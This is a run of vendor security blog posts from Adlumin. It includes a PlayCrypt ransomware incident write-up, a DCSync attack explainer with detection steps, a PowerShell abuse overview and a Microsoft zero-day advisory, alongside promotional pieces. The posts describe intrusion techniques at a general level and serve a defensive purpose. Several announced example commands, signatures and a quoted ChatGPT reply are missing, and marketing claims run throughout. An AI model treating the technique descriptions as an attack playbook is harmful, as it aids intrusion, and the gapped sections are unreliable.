Adlumin Named to Prestigious Inc. 5000 List for the Third Consecutive Year

/in /by

We’re excited to share that we’ve been named to the Inc. 5000 list ranking America’s fastest growing private companies. This is Adlumin’s third straight year on the list and our continued rapid growth propelled us to number 438. This ranking was fueled by an average median three-year revenue growth rate of 1,320%, which boosted our rank by more than 100 spots from the 2022 list.

Adlumin is focused on addressing the inequities that exist today between an organization’s size and its ability to effectively protect itself against the growing threat of sophisticated cyberattacks. For too long, only the world’s largest organizations – in both the public and private sector – have had the tools and resources needed to defend themselves. Our success over the past year and the steep growth trajectory we’ve maintained for the past several years is a testament to our mission and our amazing team’s ability to execute against it.

While the cybersecurity industry has discriminated, in many ways, against smaller organizations, cybercriminals have not. Growing and mid-market organizations (like many of our fellow honorees on the Inc. 5000 list) have personal and proprietary information and valuable operations to protect. These organizations are targeted by the same threat actors and with the same aggressive tactics as the world’s largest organizations.

“Adlumin is here to ensure organizations of all sizes have the capabilities they need to defend against any cyber threats they face. We’ve made significant strides to further that mission over the past year by continuing to enhance our security operations platform and most recently, with the launch of a new offering that makes incident response services affordable and attainable for organizations of all sizes, said Robert Johnston, founder and CEO of Adlumin. “Our growth this year and our ranking among the top 10% of America’s fastest growing companies is a strong validation for the impact we’re having at our expanding list of partners and customers.”

For this year’s Inc. 5000 list, we join a class of honorees that have driven rapid revenue growth while navigating inflationary pressure, the rising costs of capital, and seemingly intractable hiring challenges. Among this year’s top 500 companies, the average median three-year revenue growth rate ticked up to an astonishing 2,238 percent. In all, this year’s Inc. 5000 companies have added 1,187,266 jobs to the economy over the past three years.

“Running a business has only gotten harder since the end of the pandemic,” says Inc. editor-in-chief Scott Omelianuk “To make the Inc. 5000—with the fast growth that requires—is truly an accomplishment. Inc. is thrilled to honor the companies that are building our future.”

Thank you to Inc. Magazine for the gargantuan effort of pulling this list together. Thank you to our entire Adlumin team who make this company better and stronger every day. And most of all, thank you to our partners and customers for placing your trust in us. We’ll only get better and stronger from here.

For complete results of the Inc. 5000, including company profiles and an interactive database that can be sorted by industry, location, and other criteria, go to www.inc.com/inc5000.

PlayCrypt Ransomware Group Wreaks Havoc in Campaign Against Managed Service Providers

/in /by

By: Kevin O’Connor, Director of Threat Research

Key Takeaways

  • The Adlumin Threat Research team uncovered a concentrated global campaign employing sophisticated Play ransomware (also identified as PlayCrypt). The campaign is currently targeting mid- market enterprises in the finance, software, legal, and shipping and logistics industries, as well as state, local, tribal and territorial (SLTT) entities in the U.S., Australia, U.K., and Italy. The PlayCrypt ransomware group was previously linked to the City of Oakland attack in March 2023.
  • Cybercriminals are directing their efforts towards the managed service providers (MSPs) of these enterprises, utilizing techniques such as remote monitoring and management (RMM) software as vectors or entry points into the targeted systems, which provides complete administrative access.
  • Additional attack vectors are Fortinet firewalls with 3–5-year-old vulnerabilities (CVE-2018-13379 and CVE-2020-12812), and other compromised software in the supply chain.
  • PlayCrypt ransomware’s code is highly obfuscated and shows strong resistance to typical analysis techniques. Notably, this ransomware group is the first to employ intermittent encryption – a technique that partially encrypts files in chunks of 0x100000 bytes to evade detection.
  • This article examines the tactics, techniques, and procedures (TTPs) of threat actors utilizing PlayCrypt, as mapped in the MITRE ATT&CK framework, and observed during an attack and subsequent investigation by the Adlumin MDR and Incident Response Teams.

Initial Access

Last month, in the wee hours of the night, a threat actor used PlayCrypt to leverage Remote Monitoring and Management (RMM) software used by service providers to gain direct access to a customer’s environment, bypassing the majority of its defenses.

RMM software serves as the central nervous system of modern-day service providers. It gives users unfettered, privileged access to networks so operators can deliver seamless support and IT operation functions to a distributed cohort of customers.

But the PlayCrypt ransomware group can utilize the same remote access capability to wreak havoc on mid-market firms.

The ransomware debuted in June 2022 and is strongly affiliated with the Balloonfly malware group. It employs double-extortion tactics, stealing victim data before encrypting their networks.

Recently, PlayCrypt expanded its toolkit with new tools and exploits like ProxyNotShell, OWASSRF, and a Microsoft Exchange Server Remote Code Execution.

Aside from hackers using remote desktop protocol servers as a vector for network infiltration, they can also use FortiOS vulnerabilities (CVE-2018-13379 and CVE-2020-12812), and other compromised software in the supply chain.

In the incident involving PlayCrypt ransomware, Adlumin analysts believe there were at least two potential methods of intrusion. The first possibility is that the hackers gained access through compromised remote desktop software credentials. The second is that they may have exploited a vulnerability in the software itself.

Execution

Once inside the victim’s network, attackers can move quickly to deploy more exploits to gain a solid foothold on the system. These exploits include PowerShell scripts, Microsoft Server Remote Code Execution, and batch files.

Defense Evasion

When exploits have given threat actors root access, they begin creating admin-privileged accounts that can be used to disable security tools. For example, the Adlumin MDR team noticed that hackers utilized the Windows registry to shut down Windows Defender after creating a privileged account.

Adversaries can also replicate the traffic patterns of legitimate users, thereby making it complicated for network security tools to discern between malicious and normal activities.

During the defense evasion stage, threat actors can also delete signs that they are in the system to throw off cybersecurity teams.

Credential Access

To evade detection, threat actors incorporate the use of tools such as Mimikatz to extract credentials. These compromised usernames and passwords are subsequently exploited to escalate privileges, execute lateral movement across the network, and facilitate data exfiltration.

Halting The Attack

The AI-powered Adlumin Security Operations platform was successful in detecting and stopping malicious activity when PlayCrypt ransomware was used. The platform uses automated Security Orchestration Automation and Response (SOAR) actions to isolate impacted endpoints, disable suspicious accounts, reset passwords, initiate scans, and more. As a result of the detections and SOAR actions taken, the MDR team immediately received notifications and started to investigate further and take additional mitigation actions.

During the incident, the MDR team discovered and stopped data exfiltration processes through the FTP port that the hacker had initiated. The team also found malware executables hidden in temporary and system folders.

Command and control (C2) systems activity was also detected. This information allowed an analyst to gather information on the hacker’s location through IP and geolocation.

Finally, analysts found that the hacker(s) also deleted volume shadow copies to prevent the customer from restoring from backups.

Incident Response

Adlumin Incident Response (IR) team joined the investigation to take a deeper dive into the threat actor’s TTPs and examined the malware used through reverse engineering.

The IR team found that PlayCrypt ransomware’s code is highly obfuscated and shows strong resistance to typical analysis techniques. Notably, this ransomware group is the first to employ intermittent encryption – a technique that partially encrypts files in chunks of 0x100000 bytes to evade detection.

Once in a network, threat actors utilize “lolbins” binaries in the ransomware attacks. They distribute executables through Group Policy Objects, employing scheduled tasks, PsExec, or WMIC. Upon achieving full network access, they encrypt files with the “.play” extension.

Recommendations

  • Adlumin recommends that customers choose MSPs with strong security records and know-how for identifying and handling data breaches.
  • As for MSPs, we recommend the use of stronger credentials and the implementation of multi-factor authentication to prevent threat actors from taking advantage of RMM software.

The Adlumin Advantage

The combination of automated SOAR actions implemented by the Adlumin’s Security Operations Platform and the rapid response of the MDR and Incident Response teams successfully thwarted the attacker’s advances. Had the hacker been successful, they would have held all the customer’s sensitive data hostage through encryption, demanding a ransom.

With the threat neutralized, Adlumin strengthened its defenses, armed with valuable insights from the reversed-engineered PlayCrypt ransomware samples. The IOCs uncovered during the investigation now serve as a robust shield against future attacks, ensuring the protection of customer data and upholding their commitment to cybersecurity excellence.

Inside Incident Response: A Cybersecurity Expert's Take

/in /by

By: Krystal Rennie, Director of Corporate Communications

In today’s rapidly evolving digital landscape, cyber threats can be identified around every corner, leaving the role of a threat research team to be non-negotiable. Through continuous monitoring, proactive analysis, and timely dissemination of threat intelligence, threat research teams are tasked with fortifying defenses and empowering organizations to stay one step ahead of cyber adversaries.  

In this blog post, we sit down with the Adlumin Threat Research team’s Director, Kevin O’Connor to discuss their pivotal role, shed light on Incident Response, and how the team’s insights are essential in the ongoing battle against cyberthreats. 

Kevin, please tell us more about your team’s role. 

The threat research team works to proactively identify threats that may have bypassed security controls. Another way to think about it is we look for new threats that have yet to be detected. Since they have yet to be detected, there are no rules to protect against these threats, like a specific new type of malware. The Adlumin Threat Research team looks specifically for these undetected threats so we can build defenses to identify those threats in the future.  

We’re also responsible for incident response for our customers. We work with customers when a breach has affected stored data or multiple systems and hasn’t been contained.  The team works with our customers to do complete, end-to-end incident response, identify the root cause, and eliminate the threat.  

Talk to us about the difference between investigation and incident response. 

An investigation analyzes a specific event that might have been triggered by a Managed Detection and Response (MDR) team or MDR software. An investigation looks at a particular event to see if it is malicious in nature, its disposition, and contain the threat from spreading.  

Incident response is the step that comes after an investigation, it includes a deeper dive into the events, additional analysis, potential reverse engineering, and most importantly, eradicating the threat. Then incident response determines the breach’s root cause and overall impact on the business and its assets. It focuses on discovering how the threat got into your network, how long it was there, what it did, and how it bypassed the defenses.  

What are the most common ways that attackers get in and what can customers do to protect themselves?

The most popular way attackers get in is through phishing or spear phishing emails.  

It’s the user who falls victim to these attempts and clicks the malicious link in their inbox that either leads them to a fake login site where they put in their credentials. The attacker can now access the e-mail account and associated productivity tools like OneDrive, Sharepoint and Word, where they can access files or add a malicious file. Or when users open infected attachments sent to them via email, the typical Word Document or PDF with malware is added to kick off the attack. The other half of it is being redirected to sites that then do browser-based exploitation; the attacker exploits your web connection to an accessed link to be able to put malware down on your device, I think those are the two paths within. The human interface between you and the computer results in a lot of exploitation.  

What adversary trends do you think we’ll see in the next year? 

I expect to see more examples of supply chain breaches that lead to compromise.  We saw it earlier with the MOVEit vulnerability, during SolarWinds, and even before that there’s been many examples of commercial software being used to attack the products customers. More advanced malware attackers look at supply chain compromises to enable attacks, especially widespread and against hardened targets.   

What are easy ways to quickly identify if you are being attacked vs being breached? 

It’s important to realize that most organizations are being attacked daily. Those daily attacks might be script kitties, but when we pull up any specific customer and look at their external network perimeter, we see attempts to get into any open services all the time, so the attacks are constant. 

In an attack, you’ll often see many signs of failed entry or exploitation attempts against the customer. So, if you think about an account inside of a customer, let’s say, the billing department, with access to all sorts of financial systems and billing data. And we see repeated phishing emails, maybe all using the same tactic, techniques, and procedure, to get that initial exploitation onto the victim’s machine – that might constitute an attack on your environment. 

Whereas, seeing things like excess connections from a specific host or something trying to reach back to your network is typically a sign of a breach. Other signs are actions taken on the network’s assets, like programs being installed, data being exfiltrated, or settings like security relevant logging being changed.  

What key items should be included in an Incident Response when a breach occurs? 

One of the most important parts that should be included in an Incident Response report is scope. With large-scale breaches, it can quickly reach numerous endpoints within your environment. You’ll need to know what network assets were compromised, what data was compromised, and what access the compromised users/systems have to the data. A timeline of infection and a timeline of exactly what was done, when, and how to contain it is also critical. 

Another key part of the IR report is the root cause analysis that explains how the attackers got into your system so you can close the door and lock it. Time is spent to eradicate the threat and if you don’t close that door the adversary could come back the next day and do the same thing over and over again. Plus, another attacker could also find the same door and exploit it. 

What do you enjoy most about your role?  

I enjoy finding new threats that haven’t been detected before. I love finding a new piece of malware that hasn’t been identified yet. It’s like when a scientist discovers a new animal in the wild. They found a new species of bird or beetle or whatever and get to document exactly how it works, what it does, and how it fits into the ecosystem. There’s a lot of technical investigation involved.  

For example, when we uncovered “PowerDrop,” a malicious PowerShell script that has set its sights on the U.S. aerospace industry, we discovered the malicious malware used advanced techniques to evade detection such as deception, encoding, and encryption. The malware runs remote commands against victim networks after gaining initial access, execution, and persistence into servers.

It’s a big puzzle that you put together, especially when you’re doing reverse engineering, it’s almost like an art and I enjoy it a lot.  

Incident Response and the Adlumin Advantage 

Most IR response firms use third-party tools and deploy it all over the environment to collect information and logs. A core capability of the Adlumin platform is we have insight into all the logs and events for the past three months or more for our customers, so we don’t have to deploy additional technology.  

The events are constantly being saved to a secure source, where attackers can’t really modify them. This is important because if you gather log sources after the attacker has disturbed the environment, the logs may have been poisoned. So, it’s hard to determine the truth. 

Since our agent is already collecting logs and events, even before an incident happens, a lot of the data is already safely stored and logged, which means we can cut down on incident response times and gives customers some savings while giving us an advantage in responding and catching attacks. 

To learn more about Adlumin’s Incident Response offering, download our datasheet today or contact one of our cybersecurity experts for demo.  

Black Hat Bound: Bet on Adlumin

/in /by

By: Krystal Rennie, Director of Corporate Communications

As the cybersecurity industry gears up for one of the year’s most anticipated events, we look forward to winning big at the 2023 Black Hat conference. With years of innovation and cybersecurity expertise, Adlumin looks forward to being a part of Black Hat 2023. Below is a quick glimpse into a few things that attendees can expect:

  1. The Power of Partnership: Adlumin’s VP and Chief of Strategy, Mark Sangster, will speak on 5 Tips for Cybersecurity at KnowBe4’s booth #1820 on Thursday, August 10, 2023, at 1 pm PST. In this talk, Sangster will share his top five insights for Cyber Coaching Success. Discover practical strategies to foster a strong cyber hygiene culture among your employees and help them feel invested in safeguarding your company’s digital assets.
  2. Live Demonstrations: One of the highlights of Adlumin’s presence at Black Hat will be the live demonstrations of its award-winning platform and services. Attendees will witness firsthand how Adlumin’s security operations platform stops advanced cyber threats, eliminates vulnerabilities, and takes command of sprawling IT operations. These demos will illustrate the platform’s seamless integration into security infrastructures for organizations seeking proactive protection against cyberattacks.
  3. Adlumin’s New Dashboard: Black Hat attendees can anticipate an exclusive preview of our highly anticipated new dashboard. Built with intuitive interfaces and data visualization capabilities, the dashboard empowers security teams to analyze, respond to, and mitigate potential threats.

Embrace the Vegas Magic

As the industry gears up for the conference and Adlumin takes center stage, attendees will be presented with the opportunity to explore cutting-edge solutions and train in the fight against cyber threats.

So, mark your calendars and join us at Black Hat at booth #2269 on August 9-10, 2023. For more information about the Adlumin booth or presence, visit https://go.adlumin.com/blackhat-2023.

Securing Your Digital Footprint: Google Workspace

/in /by

By: Massie Hussaini, Director of Application Engineering

As technology advances and cyber threats become increasingly sophisticated, businesses need powerful tools to safeguard their sensitive data and streamline their operations. In this era of remote work and digital connectivity, organizations in various industries like education rely heavily on Google Workspace to enhance productivity, foster effective communication, and streamline workflows.

The rapid adoption of cloud services has expedited digital transformation in organizations. With more data stored in the cloud, cybercriminals have shifted their focus to target cloud-based environments, and Google Workspace has become a prime target. Google Workspace serves as a centralized repository for a vast array of data, including emails, documents, spreadsheets, presentations, and other files.

A breach or unauthorized access to this repository can result in severe consequences for your organization, such as data theft, loss of intellectual property, and reputational damage. Regularly analyzing this data can help you detect any unusual activities or potential breaches in a timely manner.

In this blog, we will explore the 5 ways your organization can secure its digital footprint with Google Workspace while enhancing its security posture.

5 Ways to Secure Your Organization with Google Workspace

  1. Identify Unusual User Patterns: Credential threat is a popular attack among cybercriminals and once a cybercriminal gains access to your credentials, it becomes increasingly harder to identify. It is important to monitor and track user activities in real-time with User Entity & Behavior Analytics allowing you to detect and respond to anomalies and potential security threats as they happen.
  2. Reduce Risk Through Correlation: Integrating Google Workspace through their API enables organizations to correlate user activity data with threat intelligence and other security signals, providing early warning signs and actionable insights to help prevent and mitigate security incidents, which gives your organization full visibility into your network.
  3. Enable Access to Users: Take control of your organization’s security by defining and enforcing access policies within Google Workspace based on user roles, departments, or specific data types. This ensures that your organization’s sensitive information remains secure and accessible only to authorized personnel.
  4. Quickly Halt Attacker Activity: Enhance operational efficiency with automated security workflows that disable user accounts when a user is taking actions that appear suspicious. Integrating Google Workspace with security orchestration, automation, and response (SOAR) enables organizations to automate routine security tasks and responses, reducing manual efforts and accelerating incident response times.
  5. Improve Security Posture: Understand the state of your cloud security by pulling data from Google Workspace. Gain insights into things like when an admin adds or removes a user or when changes are made at the group level. These insights can provide details into policy violations and suspicious behaviors.

Consolidate your Security with One Platform, One License  

Taking a proactive approach to examine your Google Workspace data from a cybersecurity standpoint is not merely an option but a necessity in today’s digital world. By doing so, you can strengthen your organization’s security posture, protect valuable data, and ensure compliance with relevant regulations. Regular analysis empowers your IT team to respond swiftly to potential threats, reducing the risk of data breaches and the associated repercussions on your organization’s reputation and bottom line.

Adlumin empowers organizations with advanced threat detection, comprehensive security monitoring, streamlined incident response, and collaborative workflows both in the cloud and with legacy technology. Adlumin continues its mission to make security accessible to markets with few resources and limited budgets.

By enhancing our Google Workspace integration industries like, education can gain more visibility into their security posture. This integration not only fortifies cybersecurity defenses but also optimizes productivity and enhances collaboration, making it an indispensable solution for organizations aiming to safeguard their data and drive success in the digital era.

For more information on how Adlumin can integrate Google Workspace and other applications to illuminate into your cloud environment, contact one of our security experts.

5 Cybersecurity Trends Still on the Rise

/in /by

By: Brittany Demendi, Corporate Communications Manager at Adlumin

As summer begins to wind down and we hit the mid-year mark, it is becoming increasingly evident that the cybersecurity industry continues to experience transformational shifts. In the face of persistent threats and sophisticated attacks businesses must adapt to the changes to strengthen their defense mechanisms.

Despite the various challenges brought forth by the ever-advancing technological world, one thing remains constant—cybersecurity’s critical importance is safeguarding our digital assets and personal information. As the digital landscape continues to evolve at an unprecedented pace, remaining vigilant is the key component to staying ahead of the cybercrime curve.

This blog explores five key cybersecurity trends that are still on the rise, shaping the way we approach digital security and setting the tone for the months to come.

  1. Cybersecurity Spending: According to ESG research, 65% of organizations planned to increase their budgets this year. While budgets are tightening, cybersecurity spending is still on the rise. In the past few years, cybersecurity has become a boardroom topic. Cyber threats continue to impact organizations on a daily basis and the awareness of these issues is prevalent. Companies understand the criticality of keeping customer and business data secure and investment in cybersecurity has become non-negotiable and often needed for compliance.
  2. Cloud-Based Attacks: Organizations have adapted to servicing customers through apps to employees working remotely, increasing the attack surface for adversaries. Most organizations store their data in the cloud and as a result, cybercriminals are focusing on the cloud as the main target for attacks. The key to managing cloud risk is being able to identify when user activity deviates from normal matters. This can be accomplished by investing in a solution with User Entity and Behavior Analytics and one that will ingest security signals from your productivity tools.
  3. Machine Learning Based Detections: To keep up with the sophistication and growing threat landscape, machine learning is becoming a key capability in cybersecurity. Machine learning goes beyond signature-based detection methods to identify advanced tactics cybercriminal are leveraging to bypass detection. Embracing machine learning in cybersecurity solutions is a necessary step in staying ahead of ever-evolving cyber threats.
  4. Insider Threats: This emerging challenge his emerging challenge is sometimes misunderstood. While it could be a disgruntled employee posting sensitive information, we’re referring to human error that occurs internally. According to VentureBeat, “one out of every five breaches, 19%, originate from the inside.” Whether it is an employee accidentally leaking passwords credentials or downloading malware without realizing it, not following security protocols leaves sensitive data at risk. Investing in security awareness training is essential to educating employees to better protect against this risk.
  5. Business Email Compromise (BEC) Attacks: BEC continues to be one of the top ways attackers steal information, achieve financial gains, and find their way into an organization. It works because it involves a human element. They trick and deceive users into taking harmful actions, sharing sensitive information or providing monetary gains. An AFP report also shared “evidence that BEC remains a problem, with 71% of organizations experienced an attempted or actual BEC attack in 2022. That’s up 3 percentage points from 2021, but still off the 2018 high mark of 80%.” Security professionals must focus on educating employees to gain awareness and recognize these techniques to defend against BEC attacks.

Command More Visibility

The trends above only represent a small portion of what the industry is up against and opportunities to take hold of. The key is to take all we know about cybersecurity and apply them fully to our current security programs. Knowledge is only the halfway point to winning the battle and implementing a proactive security approach is important to defend against common trends.

Amidst these escalating threats, Managed Detection and Response (MDR) providers play a pivotal role in defending organizations. Investing in a solution that provides full visibility across your environment, provides insight into policy violations, and takes a multi-layered detection approach that looks at your extended threat landscape will enable organizations to keep up with the latest trends. Investing in MDR can be an extension of your team and provide valuable threat insights to prepare for and protect against the evolving threat landscape.

Unraveling Cyber Defense Model Secrets: DCSync Attacks

/in /by

By: Joshua Beach, Detection Engineer and Andrew Chapin, Threat Researcher

Welcome to the Unraveling Cyber Defense Model Secrets series where we shine a light on Adlumin’s Data Science team and explore the team’s latest detections and learn how to navigate the cyberattack landscape.

DCSync Attacks are hard to protect and used often by cybercriminals who aim to takeover your network. In this blog, we’ll walk you through the methodology, detection and  more, let’s begin:

Domain control is a common intermediate goal in many cyber attack scenarios including Advanced Persistent Threat (APT), Inside Threat, and Ransomware. Executing a Domain Controller Sync (DCSync) attack is a popular method for achieving domain control. Often reliant on the exploit tool Mimikatz, DCSync can also be performed with manual methods.

Methodology

A DCSync attack targets Windows Active Directory (AD).

In this type of attack, a threat actor targets a feature in AD called the domain controller (DC) which allows different parts of the network to share and synchronize data.

The domain controller is a high value target because it stores a secured database that contains sensitive information, such as user account records with usernames and password hashes.

During a DCSync attack, the threat actor attempts to trick the domain controller into sharing the user account information by utilizing the Directory Replication Service Remote (DRSR) protocol. This allows the threat actor to pretend to be another trusted domain controller that is part of the network.

A successful DCSync attack, allows an attacker to steal sensitive account records in the database. The attacker will then try to crack the password hashes and gain unauthorized access to user accounts (including to network admin or super-admin accounts) and gain more control over the network.

Detection

Adlumin has created a detection for DCSync Attacks that can recognize and alert on the methodology used by threat actors described above. This allows for quick mitigation and remediation for clients.

The starting point is to review Directory Replication Service Remote (DRSR) related logs found in the Windows security log. Specifically, events with ID 4662.

Then, logs are filtered to focus on entries where the requesting user possesses the necessary credentials to make domain requests. The logs are examined to identify any suspicious or unauthorized domain requests that may indicate a DCSync attack.

The challenge is to sift through benign activity in this subset of DRSR logs.

The DRSR protocol is primarily used within networks to provide redundancy for multiple domain controllers. Thus, DC to DC replication is considered normal, while DC to host replication is not.

Adlumin will flag any DCSync requests from non-DC hosts as potential malicious activity. A security team can then quickly identify and respond to any potential threats against the domain controllers running on the network.

Remediation View: 

The Problem

The DCSync attack methodology takes advantage of the Directory Replication Service Remote (DRSR) protocol to obtain sensitive information from a domain controller. This functionality is not a bug, but rather is intended activity to provide user friendly redundancy in a multi-DC network.

This technique involves an adversary masquerading as a domain controller (DC) and convincing the authentic DC to synchronize its database to the new rogue DC by issuing a replication request. The results of a successful DCSync attack will provide the adversary with password hashes of the targeted users. In most cases, this will include all users.

The Algorithm

By using the associated logs resulting from actual DCSync attacks, Adlumin is able to filter on their defining characteristics to build detections. A few of these factors include user replication rights, if the requesting machine is a DC or not, and access rights. This rule-based detection scans every 6 hours for any new cases of this occurrence and will alert you for further investigation.

User Actions

When encountering an alert indicating a domain user attempting DCSync requests, the objective is to determine if the alert is an active threat or a false positive. But how?

Let’s remember that attackers rarely perform actions in isolation. Threat actors tend to chain together several steps. Therefore, we can check for other actions in tandem with the DCSync request.

Below is a list of items to check:

Verify User Account and Behavior

Verify authorized creation of the user account and if the DCSync behavior is normal for your network. This detection alerts on DCSync related behavior, but some organizations have been found to back up their domain controller data to non domain controllers. If this behavior is normal and accepted within your network, disregard this alert.

Domain Controller Syncing
Ensure that the host machine of the suspected DCSync attack is NOT a domain controller. Failure to identify it as such may result in a false positive. DCSync activity between Domain controllers is generally benign.

Enumeration of Permissions
The attacker will often check which accounts have the required permissions to perform the DCSync attack before performing the attack. Here is an example command:

Exploit Command
To perform the attack a program must be executed to make the request to the other domain controller. We can check process execution on the machine that was the origin of the attack and search for any suspicious process execution that occurred at the time of the DCSync attack.

Text BoxHere are some example commands:

Persistence
If the attacker has compromised a domain admin account, they may get the permissions required to perform the DCSync attack to another account.
Text BoxHere is an example command:

Network Traffic
The most effective way to discover and identify a DCSync attack is through network monitoring. Confirming whether the attack originated from a DC IP address on your network is much faster and less prone to false positives.

Here are some example Suricata signatures:

  1. Quarantine the DCSync user.
  2. Identify which credentials were compromised.
  3. Reset the credentials.

To make DCSync attacks more difficult, be sure to carefully control the following privileges in Active Directory:

  • Replicating Directory Changes
  • Replicating Directory Changes All
  • Replicating Directory Changes In Filtered Set

Battling PowerShell Attacks with Cybersecurity Automation

/in /by

By: Krystal Rennie, Director of Corporate Communications 

In today’s digital age, there are multiple ways that we use computer systems to carry out our everyday tasks. From accessing the internet to sending emails, we constantly exhibit new patterns in navigating the digital world through automation. While this is normal behavior, it also leaves trails for cybercriminals to use against your organization.  

According to Microsoft, PowerShell is “a cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework. PowerShell runs on Windows, Linux, and macOS.” It provides an interface for system administrators and users to carry out various tasks like running files, taking screenshots on the computer, accessing the internet, and more. 

This blog will explore how cybercriminals can use PowerShell, why they are so hard to detect, and how you can ensure your organization remains vigilant against attackers.  

PowerShell Attacks in Action   

To put it simply, PowerShell is a language installed on all Windows computers, so by default, it is an easy entry point for cybercriminals to abuse because they do not have to bring their own tools. PowerShell is also used by system administrators to complete their tasks and is required to make Windows run, so it cannot be removed from Windows as it is a core functionality.  

In action, cybercriminals tend to abuse PowerShell because it allows them to take full advantage of it as a living-off-the-land tactic. Malicious actors can use PowerShell to create a malware implant or download and execute malware. Once they access your network, they can run commands and remain under the radar.  

For example, an attacker can execute PowerShell through a simple spear phishing email, and the email includes a PDF or a Word document as an attachment; when the PDF or Word document gets opened, that then triggers PowerShell to run at the end of the malware code.  PowerShell will then download the additional malware stages to infect the computer.  

Cybercriminals do not go out of their way to reinvent the wheel when planning their attacks; where there is an easy point of entry, they will use it to their advantage. Opening an attachment is a common task for employees, and cybercriminals know that. Using familiar techniques like the above is a perfect way to lure in potential victims and gain access to organizational data.  

Why are PowerShell Attacks Difficult to Detect?  

As attackers advance their techniques, they also recognize that to maintain success, they must keep their tactics simple yet effective. Below are a few reasons PowerShell attacks are hard to detect: 

  1. Easy Access to Windows API: PowerShell allows cybercriminals to carry out automated tasks and everyday administrative tasks without having to worry about being blocked by an IT team.  
  2. Living-off-the-Land: PowerShell is a powerful command prompt that can do whatever it’s told. Cybercriminals use PowerShell as a native tool operating within all Windows computers to advance their attacks. The ability to use techniques that are already a part of a system allows cybercriminals to do less prep work and execute quicker. 
  3. Hiding in Plain Sight: Cybercriminals will often encode PowerShell algorithms to make them appear as a string of letters and numbers. This allows the detection of malicious commands to obscure security systems because it would require decoding. 

Although detection can be tricky when looking at PowerShell as an attack method, with proper tools in place, such as an automated security solution with threat intelligence, it is not impossible. 

For example, Adlumin’s Threat Research team recently uncovered “PowerDrop,” a malicious PowerShell script that has set its sights on the U.S. aerospace industry. The malicious malware uses advanced techniques to evade detection such as deception, encoding, and encryption. The threat was detected by Adlumin’s machine learning-based algorithms which analyze PowerShell commands and arguments at run-time. In essence, the malware is used to run remote commands against victim networks after gaining initial access, execution, and persistence into servers. 

Implementing an automated security solution with a multi-layer detection approach is the key to successfully uncovering attackers’ actions in your network and protecting your organization before chaos hits.  With the proper solution malicious behavior can be detected, alerted and responded to in real-time.  

Test Your Defenses: PowerShell Attack Simulator Tool 

Ensuring your organization has the proper tools and proactive measures to protect against PowerShell attacks is essential. Specifically, testing your environment for PowerShell-based attacks. As automation, cybersecurity, and the digital landscape evolve, cybercriminals will only become more advanced in planning their attacks. 

Adlumin has developed a free tool for security teams to test their defenses against common ways attackers gain access. PowerShell is a common tool attackers leverage to infiltrate an environment. The simulation runs through multiple ways PowerShell may be used maliciously so that you can gain visibility into your coverage against these threats.  

See how your security stands against the tactics and tricks used by cybercriminals. Download Adlumin’s free PowerShell Attack Simulator tool today or contact one of our cybersecurity experts for a demo and more information. 

New Microsoft Vulnerability Storm-078: What you Need to Know

/in /by

Microsoft has issued a warning about an active phishing campaign that lures users into opening Microsoft Word attachments sent via email. Microsoft first identified the campaign in June 2023.

The attackers, a Russian cybercriminal group known as Storm-0978, are exploiting a zero-day vulnerability of CVE-2023-36884 by sending victims phishing emails that contain infected Microsoft Word files that deploy a backdoor, similar to RomCom Remote Access Trojan (RAT) malware. The malicious software is triggered upon downloading the files, allowing threat actors access to victims’ systems. 

According to Microsoft, Windows Defender for Office 365 users and those using Microsoft 365 Apps (Versions 2302 or later) are protected from this attack. However, Adlumin advises that organizations contact your MDR team to assist them with the mitigation steps Microsoft recommends.  

This remote code execution attack is among several others that hackers are currently exploiting in the wild since yesterday, including: 

  • Windows SmartScreen Security Feature Bypass (CVE-2023-32049)  
  • Windows MSHTML Platform Elevation of Privilege (CVE-2023-32046)  
  • Windows Error Reporting Service Elevation of Privilege (CVE-2023-36874)  
  • Microsoft Outlook Security Feature Bypass (CVE-2023-35311)  

According to reports, there are at least 132 new security vulnerabilities that Microsoft is working to address; many of them are in the “critical” and “severe” range of the CVSS.    

The Phishing Campaign  

Users should remain alert when receiving emails with messages related to the conflict in Ukraine, according to Microsoft Threat Intelligence.   

The phishing campaign has often been directed to defense and government entities in Europe and North America with lures to the “Ukrainian World Congress.” But Storm-0978 has also targeted financial companies for ransomware.   

The Adlumin Response   

Adlumin is monitoring to ensure that any necessary patches or workarounds are implemented as soon as they become available.  

In the meantime, we recommend that organizations remain vigilant, follow best practices to enhance your security posture, and exercise caution with email attachments and links. We also recommend the following: 

  • Educate and raise awareness among employees about the potential risks of opening unknown or suspicious files and encourage them to report suspicious activity.  
  •  Remain cautious when opening email attachments or clicking on links, especially if they are from unknown or suspicious sources.  
  • Invest in a security operation platform to continually search and alert for suspicious executions which may be a result of the exploitation of the vulnerability. 
  • Invest in a continuous vulnerability management product to regularly scan your environment to identify vulnerabilities and misconfigurations.  

The Intersection of AI and Cybersecurity: A Closer Look

/in /by

By: Mark Sangster, VP, Chief of Strategy

Having successfully launched an unprecedented and remarkably influential technology, its visionary creator composed a significant letter that intensified the ethical and existential dilemmas associated with his groundbreaking innovation.

It’s reasonable to assume that I’m referring to the recent open letter published by the Center for AI Safety (CAIS) that was signed by known artificial intelligence (AI) experts, including Sam Altman, the CEO of OpenAI, and by the “Godfather of AI,” Geoffrey Hinton.

The letter’s dire warning made headlines with this:

“Mitigating the risk of extinction from AI should be a global priority alongside other societal-scale risks such as pandemics and nuclear war.” 

But you’d be wrong. I was actually referring to a letter written over 75 years earlier by J. Robert Oppenheimer to then-U.S. President Harry Truman on the existential risk of nuclear weapons.

When I prompted ChatGPT to compare the two letters, it returned the following:  

By 1946, after the bombing of Hiroshima and Nagasaki in Japan, nuclear weapons had demonstrated the consequences of atomic warfare.  Oppenheimer’s fears were grounded in fact.

The CAIS letter, however, is more like a predictive warning of where AI is headed, and what a dystopian future could look like.

Beyond the existential fears, there are consequences that are more likely to occur in the advent of AI and ChatGPT, such as job transformation for customer support, manufacturing, logistics,  and data analysis.

Like other forms of technology before it, AI expands the gap between the knowers and the users. It’s “Black box” in most cases, with a powerful handful of people who understand its mechanics, and this lack of transparency could lead to manipulation and political offenses.

What happens in a world of generative AI where this generated content becomes the data source for AI to develop new content? Is this an existential race condition leading to a runway skewing of reality?

The Evolution of AI

These proximal fears may be more likely to manifest than the existential fears of destruction. We are much closer to the dawn of AI than to its future sunset.

In terms of AI development over the last quarter century, the technology has advanced from reactive AI such as when IBM Deep Blue beat chess expert, Garry Kasparov in 1997, to limited memory or deep learning AI such as chatbots, self-driving vehicles, and generative AI such as ChatGPT. In terms of evolution, limited AI is a long way from self-aware, and super intelligence, but it’s good at learning and performing specific tasks.

